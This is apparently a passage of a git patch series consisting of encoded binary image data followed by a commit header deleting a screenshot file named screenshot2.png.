z1*LaTdT7!ilwbj*OA8&O1_+@iKxqHkL7ka<&iT(h_ul_`{{1{N#FV|)`pWyg-}kM( zw&?!DzSqrurCsvIY2970D%k0l9JhOg#=vZrC;5tvW3$LXY>sXrx@BT~IxJa-cQqWN zeS393@Pc0je|mw|}TA^!1ls<3A1P$O|%Yjl_yI$Vm$WRLE7}OjvS2W%7=otxY%{AZF zlTj#SsNUugpAID=nw4)XH%?Fc!1?RMZ0O4wwz5#N%4Yn<#vv zPD~+Gd|kazSTk*Mle6<~CGXLjzt9BcZSs2Tpv!Ntqkr+b11>v`@%uB-7T)i47ASzx zo=ztCokpJ1d~o=q*n_m6GQR6R2&;NFIz8JK)`{FFahUe5z>_~6ulyEZ8#~9pc=?$% zXSdI;FO{qJo>sFd1cBiuZZgHMtd?UQ(K}Brb!|pMNgNC|FQk=u|FeIA`Q(#~t}hSr zp4_7I_5F(n{utA*yZ@5W6zzujNdFbm{kjNDFU^vhDijZ#=Byi^*1El=>s@w|c7T&|mkrRBKOKf{awFt4f$QFg9s~Nl{N9|QR4$ZnW~-cc>5pF@%wSy5 zVP@~$YU6iscJ&40qhAlXjp@!ca9%G?E2JdIi)4mK4=$qLw%vLQ7caTbsE^ya61^QapHYH)B;^7I0h z{P~py8Lya4>=k4T*vKWyL0dY5CXCbjS{|Qcbw4n_Q{|sptz1xjaV3X>+shRF)dcar zC{5js=e=h#Hljc=3LL-EJ!V6`2YZNIYtVBjYrH2y(s5OJukq%D$Ij3N)OW%FP_DoT zBS3{zlc{flKb7lN+o^)D#cv@I6 zitmH+PFyj%^A^zfox|YW`-2IF99B;<-z;oqTe4(d-ZB%2y0X@f3aR{twd++psZ{z+ zTIudXo3D#I!;ytx$gih`IK)ut5QZq~G(YoS5JmngP}ci-26Ir(fIUjB zR(l7m|F@YdG6fV4zZY;%c_^kj-VOOJU%5To*)^jqpT9eu#teMC8QI7cnulRWkJdJB zR?f6HtJc+KAPR{UMyWJ(t9tf^Ru_N_@=>GF74EjUb4a8g2=03&SZGuIw(DRFz-5q+g8 zB)E-4KD(^?Mf?$L{A5TSh;W*lf7o~jF0h#!RzLYz(tC!tki5o9w!G9cKlA740lTD{ z2t=KT4N86-Up}@HaqY~D(SwCzGz2wD61wBCSK`2TqxjVq+>Hg;&x;)*3y=#ckL(=( zt(U+1{AqRGfgk3BBAlc0E_vS-%Gr3FqBqZ5{W2Es*mx!~;WTfYR{cxIf#zHl?W9q3 ziOz6h%`f8mv`hI)0T?_wa=$&GeN`hziyU{jcdct%OTjr;u({;+aBd>I8~_=X{tffw z#;Yp#F4qM?K5cBSpV_8j7?z*S7coUM4FSH$$FVS20=f=Zjq%#WP&+R~kmllo;|rze z?9axhCcjO<6@oA>xSW#Zo-?kC^aX?_zbmt2tZBeNUu+b!$pNBPd$CNx=5Qzv^;=yI z#bLzJ~ zUS;r_f8tWUXvnj@;rz6kW2Ii|r)LMK5NL+tV+6{{zo_~r-s&^N-p-y?#?>0R2{0-F zvNHV;&+9#+*K~IQ)$t3f4vwiV_^C`q z1Yhi$jL8oH#sSedXV)U~=kC;tVTtqc4l_N!n{S>AwbM_Xz?^4SkxJy`koF4r_%3*P zTp}>-t&?Bx86HjD0&RxAq2)Ofn)r_1;L6;6?T(Nqd1zlSRy@Yi4ilD;f& z{t=FtG!RH$oe|X#Wb~-+m>a@O53uq$Qd?VJ7XI~)>I$k5qY|KKUphPAPPS@$>67R4k61};2-7BU zVYhgZ>W{SmATz7l^D{((Bq2$)VgH^kJ?%8$_)MUbGHPW%OlvR;R^55Plda__^Q}o0h;P|Bb zfVzI>`v<6;%D~UTgs%^d1Pcoq$T)Txwh`e?Q{M%AqTf88FsPb>UFi~ zuOUn5^v`msm|V}||BBrwq+BonyOZ?Mo4}o8KxXiU?^xm$$`gN+=g*)-`2}1rIpsx# zl$5J$QO37dhCo^DQ6=;HPV*mgz=vk=&4uoI)$)UbIPFlA4^=YmFrS3_zcLD1aC~_U z?B%jY9HQH>>&8DZ{=|$X&7|fJ0`3cYRMR<-%%71%=d#1U++O{M^#%dDmuKJ_oO%^9 zG74_*H4a=w2S}}t_z8PZ1><*$B8=3=56Uo@47RnFKN#eR+Sa+iwluW|bvjSjOpAGg zw6kNN^DWreP%gGv2Bd5KbG#z_vTK)yPG%PP#UwW6=YaGG;vNO#rM%#)!^K3}3?4z1 z(_h~Fzonkj&w*FTN0qCN>lz-uUvx7(b%~aa`=mmkaI`1&q83Oj5Y}jopblW_5xMOq z@kQNP-;l_>+Z1kprw4sRKu%c-hd?Ceh;{axruWR=WZLGcW0%Y8z8@-1{H;2Lg%e~U z%~nPfPTzRnZQQPk|MW*o3R?gPnn$OgSSZ*qET7(;_DXydS*;M=Ip@V*!T0n9 z0N*vt=syk)x!-bLU)(2IvqfECi~pRdAw03VR5&+E=+MhW+E3+&R(=zQMq9e55Lh!i zC7IfIRrbJf0*G!10N9$-GYTfJlo!PbIe*5c&CfK`yKxo}gI|AhbbHB`-rh5YAKb~3 zb)yw7A|`NIV>9fVC$(%AETEzcV%AgERCjCIg>MJRL$(*Q!0Ch7z@=C3bL|$SJiy2Q{~J4AA% zXD1H$GDE`T+xHkb+=<$Ho6D(}lm>9N#^hqD5{JSQkl$1U^n5Qy{oWm)S6;}|pi4w} z4^l?uq=zrpVJ@zI$;ztERVjLMpyK{IbJ_kS>%3l*BY|oe#%L8?RDL4zGCq2TIMLbF z7;(a27ZB!F6;QEY9B+HXUrW~NX3i=o6(LAl*Xnu{s547dDW^0mNzSj}B-uQf8djH% zgq#(f!-wN09Nik$_Lg31Sx7ogP3P>Mfc|UeT;NJ zQzKiFK8vy#vHpZb%R{R`#b#AU#N6gh_H>6@i8G-h`uAF&%Ssw(6lj~eZ>JVf4<@4t z9;fMsJR6HOPx12gUbO0X(?SMxvBoVZ@GpTtc4N)U5VF*=UR_W=eAvg^X;N6{*&RkV z*!Y%HGV-Q$A~dq!uc+OdGR!j#lL+HFtVxzNR=(UA|2b6TOT`D z|KOFXL$i8vbET%uVFn(LZ8=cMn$E|)AlU(@bHR04TV-}^1tP6JZdi4w7Tp9@ua1G9 z>_?(t<7@5k2O}SuObTv+SdpDqjx4Y5L4sUDqhkGn_IVkLnFFWlemj-{C=dg>L|%yj zRdJ?_b4jm~EUf*}_zLOc{>~nJQtyb02Pt{FiP__0@QzVE;SllP1B3r9bzF$x6kF#p zV>9-qsbKYIQNxE7sw(}=9|PTk@^kLX2=3Hid`12jNu%h5d04 zNfTHS#0Udwcx>DY-D_vi^$1I@rmi>~oJ&rS@g;E32vC0}d5|v( zBN_G!dC}cSlDZk(QX#7wS9SwX-|xlnqrZTh$Or~b$_-eHv(b{jCErlilg8lC%6Sjx z0(?fUXEPzi0ipSmsiIZmTrjndGNE7bY zCj>LV$jH%nSnz5V2B;7RJP&yEq`X$#jQQa(NJu8k55Eex_jg$4iU6zN`-$%t* z9^5`XfB8ePBL3G%zGI;HN73oD6o?8HSrG)MU<=RCWmvN#iw^}e#<4mo~kxU)oDgfj+!a-}>Rbz8z< zEggV51i!a?2iC7Y0FBU{%1uT~#Mn%7y>_MgWec&20FdDP0AwDwP3hY`LNq}3CD1Bu zP>~eo_On!3=vpLP|JyMTI`j~Hpz;a@+edakZX4lhrG(qQ$tZKYM(9iBQ?CvnWBPEnvkLbk^6nMV?R&g(SrQIS`6yKU zuhR8nC=RGmD^a6Zm;;F#=NJR@w6qT?DJ;B7;pP)DRpmav`WN0@>=N9`0YZfi%Q~tT z0D1uX;cH7#R@1f-v zmDS)mWdbk&dZDdn-j2m2%g1`9Lut?QRxognaRj`x3?9UOKcpt^A)uFlYh|i0_+@lx z=60z>UN{kA=cN=j&!|*3f8DuAIK61~c%iVCJIkk?YVe0oGS-kL!6B2mlkJ16?HvDE z)9Ej@O7QaAA2a@}_{ph;N3r{8XZ!Wo1Qa1}DvjhW32%jDbf`wK^>9SF!FH)RIUo<rUHPWVU)Xlw+`$ceRHH!oCUnI4s4&@+att!qmxVkgbfMOn^ zD_38Bc%TI;)*-L$gY>d(5o0*#CtTr{{vy0USuE5MJMh!n0ToP;!iu^4`L)vXFREGh z+6(Gj7|Y~E^q5;AiqQ&2U|nI0$*b3Ozr9s9PsEn>`>z1@0!AwbQqmAMkZkap&0Oh8 z<=;wqKYjfr=S~Ty#5fQPKoOKYLImuyU%>AsKkAy(2$8yppG-2a5BL}u3gRfBf%j|7 zGKy9;ibrMg5!&WM$RS!P7!ZtuAm`ZLWpqoxul7!mc&w5wDc0sy-mTAWJ0fLd1X`cx2c9=E&sZo< zSt%$KmGEFlshr^IPlKSR!fq31Pz#z0o%p+*8k&3ez1t~YQKXFom^V#S?n~~JpA$}j z6FvMTdp6tK5S@kncGKDQYNskzAD{O5Q@|Ov(v9HXWy+iJ9&$lqlJ!{w%qOz~@cROH zBGaBvpiwu^57KY|*CnLKmVmF#j+(ds@b;%&JDtNo)rWf}&3}{tr}2ZG!y)3THu0g*k~21m-?mmuVwFqy@LeVc0$U3Xv1*#@27?H4 z`m1#MKrD&JZ8Tgy*7-TqvyxGG65~A1(}1c5*JQ(hVS;KCJAn@Yh1ZKo2Wv5`i@e;D}i0*>XD_b2Ihzj$^E?Z<= zCrI{Q3fZc;%}mBc07`!Qb8`KC|6sQ2B<0|YvI}>)X@c;9fwC6NPcF{I7l1{&Cn!`w z4KGk*K6IVILl}bsxW|esjvj*|}gJw^h|P z=)E?mt*VGotY7DEy$0Eqh9lxlP-@(Z~T~+U)-cP)gSL8HhoGgCw@Ab3Yp|rl&laLF@gD|5fAiu_BRNS6; z#@I=~B~v$b+2tnYxj@8U`FoJR{B>>_ks(!r@-ki1LI6SXMqk_fv&`RD8@W4fX-sV9Qi=mXLjKEDxdXwnCqi&&_;8CUdHu*nHoHfrPXDA*&Cfm z%dDZc&rgyMi2*obI8e#|@Z~j_DOeXEqhfe+<_hf;Rllo2tW{}y3nT5HICUsn1K$Hb z^iYQO;qPA|<%h>OCxb{JK62U0DJZ5ec~|pJH~W_;vF-z~YiUq_KkpWxOKG#&0dW*O z7WAY0*yZZP%z11m4y3j9#~>F#-Yw7_MPV8D+f_JSeQo*AO)nLUUKF6U=GR&-B@Qso4rQyd3P8j@ENw-CkydsH9-*ptUCOl zxYHt9{S{QouCYQH4WFG&jtjURz`pY%8m1umcmCiP<%EyTli{Sf!-Ni478d!*xMR9| z$k70me>1i@<=T-Q)vbaZ$ahsK*u3hTp0!5mQJF#VQ>Tr-Ba^7DMrn+*fmKdS&rYxG zRD2nufUK{vzMK%yzA$Qf#gE11GrPH0^)2XUO%ttZ|k;*cpK=#2L~bvC>{i&;5!znx9AI3=CdT*T3N68#P& zwdmBtGzIRi`n`?;EWi2vgz3dn{Rx3+m#i|*?sVE`FnC>46U$fk4GsoaKo#iAiL)#0 zhr4rs|Jdi~XFxllsDIH$+spKQ`_7Nfz4#A{lb{51?Zd=v>XcIC2jvTFF=bb7$1)Ij zcpTg|S-J>XXLGvnji;U9d!tXK=a1+)YsF-Q(vK}OMT>LX0N=BmSXO&n32ySJQiYZl zZdCoHGu2DdI61Y-nym#^lStVl2I{87C~V8p8d>_wR@JHWTie|GzLn;359@4pFYxr` z-cni*w^*+oYNZbkJY=cNP!>L2%UiQwc)wil;?_poZrz3troBsb=LeSBjZHuhQb!f`k3B4)U-c*+ib#LQ@89V#pRqFJ+QK67t&+Obx1NWJBiL=5 zSF_iyj(ez2mWS_x`Jkco$?ykuE>Qmq)Kc6J`pbo}XK6AF{6T(>rwMgUtBC^s{KBBbbCXOGk%SJb0W7QNxal{lfruEsAbnAy`ft*No<4N-S)NPuoT%Dh4ZiBDM2}I(Ey&jQY2`RuO>hZG33jLNRkYFf^LA@LNs{;~ zn6Q*nasSb5nPZ-oG&y-9w(vR;p4M?lB{rd5S$^3*rR|f-OlRX$)@l59b2wY<%4Snk z>HN)#E&RE7Ly%{^qmV@)U)3-<@*M=XN%r+!B_^&U#Sip2wXdaqi=b5WmvlJ^) zWRH)3d%TjoL}<7u-(H0Flx^A{X0eiT8%w6roqjcxIV0)r@@UXwjg6(ZP?LXuxJ94r zp@I##Iw~OWMd5O0g2J=>>F0*5T}#yZxzd~jsouiOlZj_h0yo{lnCy-p9Sm+OH;>Uxc%<*XVXSJdE5j?qMu;yeMh@QiuLxu+-(oL@Tx$ z-NNZ@rLMia(yh~{Rx(nu^#gic2Hb~~3k#hsw#su}SmV$p*sU!bXxwg^Y+6t|TT++H zw>B@dlPQMEZ5LKdGp?YYA0g>r3bK_V}>Ea*E6>{!c)OngIvP=}uTcmgRDe6xfHGzf z(X>y>1MSj+S~C|_5g#c!E4%(uytmM-<)wyhj~L|eQt_v^SNx76fbSL^-33cvg$h|m zf3CSC}tVBC1j@i zL=Lw)WwN;%))IPUY7Vkb$h0@Ab6- zm6@V3&2Wk}v1}HIcXN-uo z!*coTjFW|T|M9%joZI@e>Nw1eHH}UIJ37o<_ zTpQDysIDw+k8iC~9t+z?Fm7o7L2sOTU^cbQ#<{nFC{Labep(NHahtu#W3lwUS7n8P zd2HMaq8Vtqm$!zvVD1k=bg%Z;G@@;v$hVJQ*a?A%r9Vs^!r~HDh9beuDiw+=TPX>I zRUs?+0=GZ(jb;24f@JzWf!70BK2BGF+9pXWyzFv;aHkmcpifR){1}XF zJ3Ap2K~Cyn);(#mqeI_Nm7oh!iG(OoB=Lb z&qptGw)G|#4`zTZH8gZ_XjwZ3rk}LdT0bzOIkmvYfwBX7Ig-46O)-y($^vL zkkpk;yE)AVn|_8Br-t0hZp>{a%D)i_{%thNAdnvB^Tx<+lUoz^>-(L)QXjz{lweB^ za6+k1Vog)W+e=&c{QHH3l@!>cdNPUq#pZ*#NqpF)X;fj~@lPRukl?6mCyL{f6x1Dc ze?i>)u@*o9*|N<7ugCP+Hh%r65foxgAKqiF+Rx=LVwWyf-XQJnkfoM;lAZm@lt0VR zm`6fpXCk6hc5%g(ciC`d_I36Bjsj!jWg;qNI^0ze-!i+6Il8vx%M;3M-MWH{PVv*4 z?F43>zWiEa&eLrf?zvnTGWL*#%PRE4@3F3CFUdT}(uTKG684 zsPjlm?jL>EjyR~E7C3nI2*V#?_}-wTWP*rA+t^xS;!zYf=Sov-SQnACWNzKj3l~qU z%;|qqJmi^UE<#{ArPQ+x!tA8jxb77NaFEyh>DXpLsq2@7jE|)F$ed zo+2JCvNA@%b%!}HX4GMC6tmbVuxxU)7$X9;4nz!F!@w7yUgysibHOl zoN`BdQ}dOkrrg(}yf@NcMQ&rm?b3u9yM~Rp7p)$?AB_JHK@98DA{gV~yl~Vcxs+HL zAh|J#^(0Ifjy3XYRfk(jZyopeAP;@usk(k;ZLB!OrK5yzEgW8NZ&%90&uI`r;jD~j zo9ZcAf_uwfkXeyP(Hx4HwPErrN4g2?Y%OJ(4mo?bPsA-#X3u`CJaMFAwD@d&Q*rhn zabak+p4;LqGCWX!(G^UjW?3jmB9|XxUSjR!90R{ayaF#l8Z0c zH32`-0&kCM@gAPqK4K7*<7IVw&~a*cW6HT@O!QJ@98+bfXW(4t;4+!LbKA=SfsivN zG*sB4s&RANdvelyHaGja2+Q*5hn>eG?K{#oNY0!DVZu;wXa+UMV6f|IUl}Uj`=%?0 za$1X_H@S49k43`H=gQmCizF6_Jw=>h){Qkv1MVcNn(>cIx(-d?s)q^1Ce`&e+8f?D> z?;jGq5Wn$drcq*LzXg#CuE#QIo?E;$*yq~uM`IyQY}dEWW{`>OPrz#8mL?F%19o5A z1cuWTrKhsA7e;fE9X}n?Ui(@sL@sbmwq0(Hem^rgt4N?CPIn6C57{SjG&P0=5Dqr& zrEA0u^@Ke=#9_LzE7Q}8I9Y#5%XI?T5?Rs}H9d{lm=-&}v_|v}L(LfiaTJYLI}eCa zk(6@R2S}uyrIqV;yv2B9;XPwlal8w;FWgB{!=^_xs5id3c`!sCVZpezc(5qP3w1j{ z%u;iUu-|NKRXcI15Ur>7pm7{N6lEM>dB@Oj(XP07JP{`N$*syxAiizU{b#*;o*UH{~l7k1-ian+BdERZ1>@!N$1a8&H~I@(3|v z;ixO=dS72(`2Mp7;d=?njh_#Y*D{FV6B~{k6NNda!&#+DTedYX&Bou#;>mqFMxBRZ*H$F@7E_V25oNQ)FD=N>Vmp$;EH>xDT!|YYegi#k z46p0HT&TUsdTQ*FbXOG0yPQM6&oz6-b2Zo5y{SA`Y`D8d6T!~96?^)$s9DS0y;2Vk zs>2$CKQt3hD!th$aS9fv9VMi~6tCjB+6^htu-wc*MmS_q6urHX9mNVS5y36ZCOUL^ zvGlypl_0U`yMM|l8mpy08w0Pf1MsrFS?ef>nwZ>}C`%b9ol>d`x4j#dwCcS2ZRAw` z!|MvlaS|M|1s$v*ugU)CvMV@B828%z9CL72BUAJxPcyL9?LY{w(t9eQ#d&P(Sfr@A zVnAG_V<^=={|q$BkK48N5*Oow=(i}XVhbfHiqV3CbGVH(0C?qZyDs(hwK$Zd zA`R$`LZoD0_&A)Zb0#(B^?};BXf_ManpCR{zD}JreBGprau`C-xOa|(qBl&UYCBD*E}Sx3 zdf~sM8?JomN*7^!#JqHAkg_p0XxOB&a_J6$i?FP2Y-&1%`0h~Pm*a4q*M4)7m(W{1 z_>FIVR*L~c9uJDKxb=xe$SjFNTkgYRm1GrOAsfq^5SW*jc%ue4KU7CL_p+4E$F2}q zaAeiW#lqMR-{9MQ)1I4sybg0K&2>WCYt)x4x?OhLb${q!Jr$&v7q;s;Pq9QVHAksZ z?289F!-m#ytPLo%vBz2LXn8qh%-)?iPCpize8~_F_k3s*bw;6-oL$6LhZ|bBArr_m zzU6mB`Mn1)rPE@09P|U1;b@P}=WC7eQn7P`d6r$o+u5IhDOk)_pp|B~!t?VN7oNJW zu(!KZfX4wz3rX47H7x}iM6kKfuM?6}Nm*-kUO1h!p-V&W`Qo>N*|nXjFRv}&VuM9v z;N0Pc3lG70=FweV%PVH43;Ih-xb1i`xghkKUwi&)_FAdi@UeBVJRATU$GX0N#){&Y zSk5`a*M{izj&hF5zPTc8twlLTc_@2XB3Xl6i`BLDS z^kRA~?*J%lql`dv6dXQ}egQuO$KIZUuy02@JnBxhEi6m959iJuUen78_dEyOD2R=u zGVq20zD2!02UT5tnE-jZcmLzelHgiWagwc*V^NlFXehlmFB5v<7B1?-gnmre@r!qC zK1Dd$ShrxRMaQd?=}$xv7MS2sY+@9pc*cT3aH4Oj#^AA;pQ<7(mK-`tS-(WZZwjbv zF0q;tqf8^$d;`rsM_h2}EQon{JtdBkT_9zz8`i&3+w*=ACusa(F4=x@fnf%!YadYp zOK<2L5uM3UxVh3I$?N4+VSySc8nEPOa=$5(Wf0UE2$jXx0=F(2r^JRFsEv&erQb3R zN*e!sXlbNve;Z{rOD-tODlB>Gijb&B3N#)dICJyk#Ia{ELw*49M4Yx{i0 z*-CCAQnD>4JH^(-(o!}h)ltL4)rsB>S~WNEsMPJsB#wXqTsFuzuWKrBJmu1%&(p4_iGH7puhvQ1-^}y9t4;1Z& zF;3_xm;7!6!Z4ZlY+aEvZ~lg#Xc7i&qeTQ}oStrV$Ccpw5N9^#NLqJH%g{0h-?tc?|6-VmUOKx>{<2aY%k2^Cx%IvSQYYt z3o=iGTa6fNET_+?pJ@%Tu|m#x*sg~a;!eDtrIXIUSmq^`3H6EQ$PERM(lPGUNYB&5 z58NF?Q^7Q*dOO}^E3vF+=@+i1Wa@Zo42yviCIkU<^z#AIL3#Ce^#!x^6{lRu<7SF0 z;b+p4jAG+{#TXlB!xUuF1y=yvoGEpOn>WN|cp~Je`yN8pz2VwEj=*` z4b-zor*ceYMQdzix+NCALABqv8oq z?+$|y=YFaYYEFa=E)T3U*ia4805KkrB*B?l?v##r&%8_e$e(I$7%6Z{n zol_~~Hmmk4g=8N~NYu=bvFro73t|I0>LC?&1`Y=G9#e{3YHmqQwQ|JsqaGAjD2Q%s zaJp|*5`{pnWKz#OYpS}w#Q6ra(@pWP{!li^rc<}cLXjT5$zo<7{J@8TK;!q~RpoP#6uBijj>n#)S zK>cf8Lcd|t9Mr1*6u#5ksLBZY-sQM?Yo}eV`r3#Ad;ym5`v)HA@3rfX5U_54yh7#c z3(DBl_tBtU?Xw4oaoPi8u9PWkY+SIb5D(lKK(&`8mbH=SUi=G?%Z706D+jn6U9j*w zaBXaSume;kKE)kRqyZPI&(~U~B54NdLLTt~*Y&N4!oEpQXNin!Rzm5oVR2EtzLz1{ zoEEY%0OCz?+`N=GJsh3qU420=2s5po66@|BWgZt=Svd$`vCr1HAja*U0Wg5xvp8Y7 zJm;poD=cE1{Einr#qRParo@!)Tj~b`WAp?ozrH0*^|i(VMS+KoNhH{F6jok#yi|4( zfX%8t%RD9E9 zSY*0YObL-3)qCvpWf%FP0(hU@48Ki_S;uGN`fP6V><^Nz&?JulA@6U(7d9-dzG77} zv{Sjg&IliU*&(Xj=;*2!{R-zMsL#}wXFK({Oe>T_V*3e>RM(deX4_L_YZ|sa@2iPG zkUT1`yyKQ@YcDMw>Xy=vR+q?2pNVn+Y!j>+$p^~(GzcP%Y3E4vK0T0nq&eA4-|0#T zkg7D$=z87uEX7*4?0%PHUvVah^>x^B&oDI&yk5@31i}%}i~4X6+;E+<8zD!*v0OKt z3#gEu?I}7Zr+(%#)=(+E^725RNSMAxGX%19XrM3`4RB6s&GYn&oh+(KVgO{)nS`Y~ zlc{?!JxI827oUQcvBI>BO8024M3J463Zcdum5uKZPFj8e9~x>Mh-@Zj2!ddMGnQ3~ zisWZ$2{qKH(HoCLzKPo7MGrJJsq+3{l`Ti%MMYwASBixtaaU(ZqC37P64m2u5$866vOuB+DRI4_Jk*8&rz42HfeonpDy}tHx2t-QEB1IEH z-WKlJ8Y7(sl2?q%7dU)8pt(TkQp*>6*_6%aeg2&xmyu!wMAF2yp_^c$)cjf=7y|-K zl&z=Iy$M`V!LEfOxtSAR*U^5l>GC1zkm=qxQ+hb@jFV_rWYe^)ogC>|N~1f0(B57s zMhufG=!?q)%pr0b`v#)+ksj2XR4ZfMu&r+jJp~?eZ-Mg8SnsEv1seQn=pNm?tLnO- z)o>_xr>IF?6OvW+@cM)lxD~29A3TiX@Z?p{Fjl?%7b@ms*)2ME4ruRN{?4uYZk>5M zFN~i33hvJU$HCury7(v9Krt8`Tz8=5Ahc}W|z=;0`^&G{k7#nV|=WiVEjyaQlC zP1Spl`qF-qra83__N^21w{X9L%EDknEX)n!CL+y~b8`k>Xk*2O_b`|to{^Bu)`YVrkIU zVa!LMg+dH@mJ3SSAfyh&<$zFcaZ95pOFx%bO47vxqT=}0{)jISdOdUno@#KF z!*yl}+D0Pu0syVY2_Qg{Ume%b$MEXq8?WP+oop31Bjh$M6)r?mt|~jHOFJjlq+&I} z%8ii37%*Y5F4sr?7+5WMT_D~0p3bET5hV@X{hIAt9kCW-!;d;dUMgTPg5x2@sTj)^ zTv7C&VUbl8KF(zx^L7Tnd4l>3SeWqX>pvP%2(WNeW)_%Cko8cx8JBK<#xNdWd({Wk z(4?F;B^Ydv=$}S|#D=nc%7Mn@rCso#)h7S~2Ih|#j8)rJcNZ;bC*x#YIl&Dou#T&D zzi<9vQ26}?<9XoP;P{giANbRZsxlOb?1o>Caq8<$iGVL1u>fDb`uUY*WTXas{*`7| zhZZ*Ux^qb!=vJNn)3G@$@e^+5xnUk_YOWvMa0t*a}#h|@O1NdcV1Z!gd?^9a?& z333eZ>^2va%|9oPnb*RrNyKvS8=fYpjsL9gPXhq48=~8NfG=#mkj=9hsOQ@rKAa9V zf%@}DN|52FM`3+KWUiR@^)i&j^;MeM08)f}&kJV!>9G-5_v7eQAwgLKD?oil01tZ@ z(YwQ&QoI|J^jkUsd|k=22qXiT>v(l0ep-F=`drpebCH;I1VUw|gQW7Z5YPgMh87+k z4Z>g)#l`{u>s`v(24u*5*0d`bAld$k9J#DR?H*Hw7E!$(UkLyNt}@Dpf{f*=n-<(d z!BX~$X|n`8J}$dSyLjd;K=W>68zudlK_=@H!Z&-)0}D8p&Ld}-91TQbhyTc{fwB7% z6rGdp1m**~Y4(#HT>G2yA;q&ncP`%nFfZxwX`N>PaJH&*pLTA*{imu2=YyRXn?S&- zybBE$pLU2U$p-=ABdfKsN@SP?3w09mfVir>rMyRFgV|~;r;ans0^BlkdrzYnJKW-T zIdu(DL7MZV6t#inOE5YVkk#*Ug6ZT}G+2)kDgN_)@VU>U{_=ycJ3$aT*5a>Br=b<| zZ{LlT24!q=AoNJs86Yr2R!Tb@)%SgdR|fDFK-x9KDT5kf!r)Z5fg$^_$$N;1~vR@nBWuM=OXRhkZ%Eu#n~Xc>V$083aj<1ZIXruy=gu1(7q z1HB5Efaj`RNf?CyDhaUdSHb4y<2OaMus}RMHy;66_$-rWzg!S4&)J!y;9utmhW}5= z8cjk!vezGu%7eh}f_;0a7Fx%tAM>1(?+)op?o@Ag7y{&f2A-5Hc~PKkfk{YR2@wM8 z{fh2Q+o1&XvTIKpMX{#os+3Ukwh>mO$W&q7G1L~ojFBoxjA4u?pw2*H%V2yVeEpud zX!&bEmSgx?6ojTei)vzlh<&a@@nT=~vlO`=;F&l=QMQ*f*_Z>Fb^(0&SQfY+-MdOd z54}P^0vI`s_9a;V$Q{%NY;&A#trc!AscpttJ=h8b(SYgQEcl{t0B}sMzCTq10tqE` z_6~$3o-<;nFHbxJv@Gkiu)R!ge0jz0SRij^y<~Y&@aHUkV|lP6fI0et%4Q+>8w{XS z+oc7WS4xVMhf)=RNo!9iV}X@hf=zcpwF8|h*8+hgTad!dEW84l)9 zKstE_fFWKx2OP!d%gcCsnQ11@iRW`0*FmDgCI|F{D1p#x1Ts{*NZ$jp$yOS**{Z;< zzNxYUefX*(f-2=jfzv;%f^`162WzGcc#^uP$Bks@R?Vxw(@tGpvit`?m@kc8m*hu7 zjzbwqfzvQ8|aq`8`g|E>T@cu@{rIP%puq@?K^gqe z)ytsbu;Z{hQc<$hkH9PBD7AOs|9qQvMH)`Kks+c1p;K}nc$ZNCti*%P{ZC03c>izL z1plU`T;T72Ze4$spwV5-544-+p)ogGNYn4H{K-ak2p#k`bnFHDF$2Vp`x~szy!oCV z?)`xz|BN|;U;oc10r5zmu_%VrBlTC2%4j#$n$vuKME6{~$K+DhY`qr0u$v1gYcBLY z{TASmQU6R);QIf4q0x9NjH^YMSD7WRG&^Q%{&f=oV88SKYcCP`3&SU^pcr*1QSR1ta9cMm(Ejx_KgS860~~*vFC-TMw`^^D z%Vb^X6E_63ni?Gcdp!M@*Zl9AD{b!kT0+}dvz-oY>d_>i+WoeB>EU|+X=%NdPqjv| zNU?YeF=0RAIvpTTb^kYNton*It4?3fDs`ZKy7?9CdcutT9|!jzE=eQRpXzqzBJcpX zPP~J3yOmaq_%C4d5!mS86)3@oZ^6N4aReChx-1X=#LF-BuP%_XpDz%`=Gd8V^FiD z=BhQ^vSI}3yI}js*-d;u*k=)_cN&vH(RBnHjD~l%Z-p#r(}e+*I9To@MzLlRA9Cg7 zeu&D5vEN7ZIGbr@UE+0eoH29mlS4BR?Dg1ZrzAGS^qA}@es>dydAR<6J@WtRnEzcT z`3K8@;vAz6*hO{7u1RX8Ux-T>jN5)+L&eIV1lK53lqxoRFYP}(0UiKxHm?+H3!WMi z*H9`_uhvYKybGW6Ba%H!yt_h|9K}Q64S)=AeXmgb{{<0(Acfw2^{Gz-T&;MP=u{_i&-{r4T~hXeoH z2=JdOP&K{nFzizcP?5&eNuG&L&)H8+V3XbzU7>#IoDb6kRY_Nh4Hx`U7YI;vhyN+) z|0h8IKeneI6y(PV{=abB|5SGWPzVR%_u<`1CVg+4&WXoepg03`&Gt*ibM{v8~liiLF&n%aPA}psEQ-wghJEtEXK>t-m~BS6Cc)#k5~?K1$fip_&0n zx4O!<790?ucsGwN(Anke*Q?MEV2|sXXspf$nFaQKZQmnqdkvN8J*^Qhk3ylu#l;s( zTfA($mcS0PO5oz4z|z*=A9D%p4qSE?JnepNi0CF{*7zmQv|+Iez1amyCTH#_pqyr` zE;W9n_vFwpj}HpDJo~Iw__R>z#bgiN7TT;)$g9^q2Z#pYVPRo>ci;aWzur$+tW)t8 zB*Zu>2bq9L(ono+G+P zA`$rjy_LR9rcBuQZwcZy*K{4I)pIJNC32`NIAKrlq91*8)6AL@3bcvA!Nr`JZHSZh zKgnM|8VHZWt@`7>fCsKS)SNb_d$5SdV|33MV?%s#PUFfp1>-sX z>5#)V9L+6z7Ukf*9yK>kVqLo*AVq$p+0}hu=j7QB^H#xj)v3kBu3e)60Rb;r;ojGR zhrm|Y;MtpvV0T}Ugwf!!5YY{@X0NVy`hj*>%1!O9&*)M?F zv5AO&uz`4_sGWgUww|`zOHQ(y{pvV^8G$r;ZEUX=1wX$<{>^>$at{S!myHU zXuB^X-)ua8&ooFnK~h(~Ore;89oJCR5LK%g>|YI@u9^5%GFDe4$+5v#suJHJDVAEfASE`t{IsXFJvMcA z+hA)LqmVcIbR3n*+M^kKOexvgpf7gTrUI2oliv|I*xUQGl!udn=R&nNIyZiX4iOz4 z?fMi`2cz8Ohn`y!D~eld0?%Qsdv@%Cx`sx6EjBJLPS2&sRBS3K*r5}FJZwp?VHO+G zI;!K)M@EO_crPDb8{RIp&3S7X6th_=xAu86ON^o?ngdy*4>G#9w-;!s($I&hoo^%SXTF7u4Es6BRlGSRVXqG`=q zRyJ9;C%>{)u5;o;21qtRx#BZ;vg*pJC)iFrXvVp$eLyR7_ReBaN=o^|etUOW4byG5 zt Date: Fri, 15 Feb 2019 10:33:20 +0100 Subject: [PATCH 011/214] Delete screenshot2.png --- screenshot2.png | Bin 93365 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 screenshot2.png diff --git a/screenshot2.png b/screenshot2.png deleted file mode 100644 index d1114bc0cc4822c6155d411ffa920838bfebb1dd..0000000000000000000000000000000000000000 